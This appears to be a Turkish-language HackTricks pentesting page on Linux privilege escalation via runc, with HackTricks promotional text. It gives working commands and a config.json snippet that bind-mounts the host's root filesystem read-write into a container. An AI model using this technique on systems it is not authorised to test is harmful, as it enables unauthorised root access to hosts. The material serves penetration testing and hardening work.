hacktricks/linux-hardening/privilege-escalation/runc-privilege-escalation.md
2024-02-10 18:14:16 +00:00

3.7 KiB
Raw Blame History

RunC Yetki Yükseltme

AWS hacklemeyi sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları:

Temel bilgiler

runc hakkında daha fazla bilgi edinmek isterseniz aşağıdaki sayfaya bakın:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}

PE

Eğer runc'ın ana bilgisayarda yüklü olduğunu bulursanız, ana bilgisayarın kök / klasörünü bağlayarak bir konteyner çalıştırabilirsiniz.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

{% hint style="danger" %} Bu her zaman çalışmayabilir çünkü runc'ın varsayılan işlemi kök olarak çalışmaktır, bu yüzden bir yetkisiz kullanıcı olarak çalıştırmak mümkün değildir (köksüz bir yapılandırmanız yoksa). Köksüz bir yapılandırmayı varsayılan yapmak genellikle iyi bir fikir değildir çünkü köksüz konteynerler içinde uygulanmayan birçok kısıtlama vardır. {% endhint %}

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Red Team Expert)!

HackTricks'i desteklemenin diğer yolları: